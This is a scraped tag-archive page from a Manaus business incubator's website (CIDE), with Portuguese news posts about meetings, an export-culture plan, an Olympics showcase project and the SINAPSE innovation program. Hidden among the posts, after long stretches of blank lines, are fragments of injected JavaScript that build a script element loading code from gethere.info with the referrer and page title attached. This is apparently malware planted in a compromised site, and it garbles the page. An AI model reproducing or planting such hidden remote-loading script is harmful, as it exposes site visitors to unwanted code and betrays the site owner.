• 92 3216-3892
  • secretaria@cide.org.br

Arquivo da tag reunião

Palestras no CIDE dão apoio às empresas

Cam2

Evento reuniu secretários estaduais, empreendedores e representantes de instituições de pesquisa.

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) recebeu, no mês de abril, a 121ª reunião da Câmara da Micro e Pequenas Empresas, com o objetivo de discutir e informar sobre formação empresarial e divulgação de projetos empresariais por parte das secretarias estaduais, bem como intensificar o contato com as incubadoras de empresa.

 

Durante a reunião foram realizadas diversas palestras de apoio às empresas vinculadas a incubadoras. “Estou muito satisfeito com a participação de todos porque nessas reuniões, os empresários conhecem as instituições que podem dar apoio a seus projetos”, diz o diretor executivo do CIDE, José Barbosa Grosso.

 

O evento contou com as presenças do secretário executivo da Secretaria de Estado de Planejamento, Desenvolvimento, Ciência, Tecnologia e Inovação (SEPLAN-CTI), Gustavo Igrejas, o secretário da Secretaria de Estado do Trabalho (SETRAB), Breno Ortiz, do vice-presidente da Junta Comercial do Estado do Amazonas (JUCEA), Caio Fernandes e da diretora da Rede Amazônica de Instituições em Prol do Empreendedorismo e a Inovação (RAMI), Jane Moura, e do licenciado em Letras, especialista em Comunicação e Expressão, Francisco Lavor.

Palestrantes falam para os empreendedores do CIDE.

Palestrantes falam para os empreendedores do CIDE.

 

Cam3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Reunião no CIDE para lançamento oficial do PNCE

Comitê Gestor do PNCE se reúne com instituições participantes no CIDE.

Comitê Gestor do PNCE se reúne com representantes de instituições participantes no CIDE.

 

 

O Comitê Gestor e de Divulgação do Plano Nacional de Cultura Exportadora (PNCE) se reuniu nesta segunda-feira, 11, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), para comunicar o lançamento oficial do plano a toda sociedade amazonense, na próxima sexta-feira, 15, na Superintendência da Zona Franca de Manaus (Suframa), a partir das 9hs. O evento é gratuito e aberto ao público.

 

O lançamento coincide com a reunião do Conselho Administrativo da Suframa e contará com a presença do ministro da Indústria, Comércio Exterior e Serviços, Marcos Pereira. “Depois do lançamento, acontecerá no mesmo dia, palestras do Banco Nacional de Desenvolvimento Econômico e Social (BNDES) sobre financiamentos e do Ministério de Relações Exteriores sobre o papel dos setores comerciais dentro das embaixadas”, disse a coordenadora local do PNCE, Sandra Almeida.

 

As empresas participantes contarão com uma gama de ferramentas de treinamento, capacitação, consultoria para adequação de produtos e identificação de mercados. “Haverá atendimento aos empreendedores e empresários que queiram tirar dúvidas”, finaliza Almeida.

 

O objetivo do PNCE é aumentar o número de empresas que operam no comércio exterior e, consequentemente, aumentar as exportações do Estado. Contando com a participação de centros de incubação empresarial, federações de comércio, associações, cooperativas e órgãos ligados ao empreendedorismo regional, como o Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (Sebrae).

Reunião discute a participação de todos no lançamento oficial do PNCE.

Reunião discute a participação de todos no lançamento oficial do PNCE.

 

 

PN2

 

 

 

PN5

 

 

 

PN6

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Olimpíadas 2016: Empresas podem ter espaço internacional na Arena da Amazônia

Empresários participam de reunião do projeto "Chama Empreendedora".

Empresários participam de reunião do projeto “Chama Empreendedora”.

 

 

Empresas do segmento de Alimentos feitos com produtos da Amazônia e instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE) podem participar do projeto “Chama Empreendedora” e expor seus produtos durante as Olimpíadas 2016, na Arena da Amazônia.

 

Segundo a coordenadora local do Plano Nacional da Cultura Exportadora (PNCE), Sandra Almeida, o projeto é uma oportunidade de fazer negócios durante as Olimpíadas 2016. “Esse projeto nasceu na Associação Comercial do Rio de Janeiro e estendeu-se por todas as cidades pelas quais vai passar a tocha olímpica”, diz.

 

Ainda conforme Almeida, a preparação e a participação dos empresários no projeto “Chama empreendedora” vai até as olimpíadas de 2020. “É um processo que começa agora com as empresas que estão prontas para exportar, juntamente com os parceiros institucionais”, conta, acrescentando que o nome “Amazônia” tem um poder de marketing muito forte.

 

Para o diretor executivo do CIDE, José Barbosa Grosso, as empresas da incubadora têm produtos capazes de competir com os de outros países. “Essas empresas são capazes de ocupar um espaço nacional e internacional porque fazem ótimos produtos com ingredientes da Amazônia”, finaliza.

 

 

Empreendedores, instalados no CIDE, do segmento de Alimento e Confeitaria, foram convidados à reunião.

Empreendedores, instalados no CIDE, do segmento de Alimento e Confeitaria, foram convidados à reunião.

 

Suf3

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

Abertura das Câmaras Setoriais conta com a presença de gestores de incubadoras

O secretário executivo das Câmaras Setoriais, Laerte Chíxaro, faz o balanço referente a 2015

O secretário executivo das Câmaras Setoriais, Laerte Chíxaro, faz o balanço referente a 2015

 

 

A abertura das Câmaras Setoriais da Secretaria de Estado de Planejamento, Desenvolvimento, Ciência, Tecnologia e Inovação (Seplan-CTI) de 2016, aconteceu, na segunda-feira, 14, para apresentar os resultados do ano passado e ao mesmo tempo divulgar as ações preparadas para este ano. O ato aconteceu na própria secretaria e contou com a presença de representantes das classes patronais e laborais do Amazonas e gestores de centros de incubação empresarial.

 

Durante a apresentação o secretário executivo das Câmaras Setoriais, Laerte Chíxaro, destacou o esforço de todos os participantes em cumprir os trabalhos propostos e fez uma avaliação positiva.

 

O diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, enfatizou a união entre todos. “Vamos seguir trabalhando juntos, em parcerias com outros segmentos da sociedade, para que superemos os desafios de 2016 e possamos concluir com êxito os nossos trabalhos”, conclui.

 

Na primeira reunião do ano, os convidados conheceram o Plano Nacional da Cultura Exportadora (PNCE), apresentado pela Superintendência da Zona Franca de Manaus (Suframa).

 

Participantes das Câmaras Setoriais e convidados no auditório da Seplan-CTI

Participantes das Câmaras Setoriais e convidados no auditório da Seplan-CTI

 

 

O secretário executivo das Câmaras Setoriais, Laerte Chíxaro, mostra o balanço das ações

O secretário executivo das Câmaras Setoriais, Laerte Chíxaro, mostra o balanço das ações

 

O diretor executivo do CIDE, José Grosso, participa da primeira reunião das Câmaras Setoriais

O diretor executivo do CIDE, José Grosso, participa da primeira reunião das Câmaras Setoriais

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Programa SINAPSE: CERTI atualiza resultados com agentes participantes

O diretor de operações do Instituto CERTI, Marco Giágio, mostra os resultados do SINAPSE aos agentes.

O diretor de operações do Instituto CERTI, Marco Giágio, mostra os resultados do SINAPSE aos agentes.

 

 

Os diretores de incubadoras de empresas e representantes de instituições de ensino universitário público e privado se reuniram, na tarde desta quinta-feira, 3, com o diretor de operações do Instituto CERTI Amazônia, Marco Antônio Giágio, para conhecer e atualizar os resultados do SINAPSE da Inovação, programa de empreendedorismo inovador iniciado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM), em parceria com a Fundação Centros de Referência em Tecnologias Inovadoras (CERTI) do Estado de Santa Catarina.

 

 A reunião aconteceu na sede do próprio instituto CERTI, em Manaus, com todos os agentes que participam do programa de inovação. “Fizemos uma atualização do programa e a partir de abril, iniciaremos uma nova fase que é a pré-incubação, isto é, é o período no qual os empreendedores selecionados vão iniciar suas operações com recursos da FAPEAM, gerando retorno desse investimento por meio da geração de empregos, recolhimento de impostos e gerando novos investimentos”, disse Marco Giágio.

 

 Ainda segundo ele, 1.188 inscrições foram feitas no início do programa e 40 ideias inovadoras foram aprovadas, e os novos empreendedores são livres para escolher o local físico para montar o seu próprio negócio. “Agora, eles estão na etapa de formalização. E o local de operação é uma decisão exclusiva e independente de cada empreendedor. Há várias opções e que cada um avalie qual é a mais adequada”, orienta Marco, acrescentando que o sucesso do SINAPSE é devido à participação de todos os agentes e parceiros.

 

 Conforme o diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, alguns acadêmicos que participam do SINAPSE já estiveram na incubadora para conhecer as instalações. “Nossa instituição apoia as iniciativas da FAPEAM e do programa SINAPSE. Portanto, estamos preparados a receber os novos empreendedores que queiram instalar-se aqui”, destacou.

Representantes de incubadoras de empresas e de instituições acadêmicas participam da reunião.

Representantes de incubadoras de empresas e de instituições acadêmicas participam da reunião.

 

Marco Giágio (ao fundo) mostra a relação dos aprovados e selecionados.

Marco Giágio (ao fundo) mostra a relação dos aprovados e selecionados.

 

 

O diretor executivo do CIDE, José Grosso (à isq.), conversa com Marco Giágio.

O diretor executivo do CIDE, José Grosso (à esq.), conversa com Marco Giágio.

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);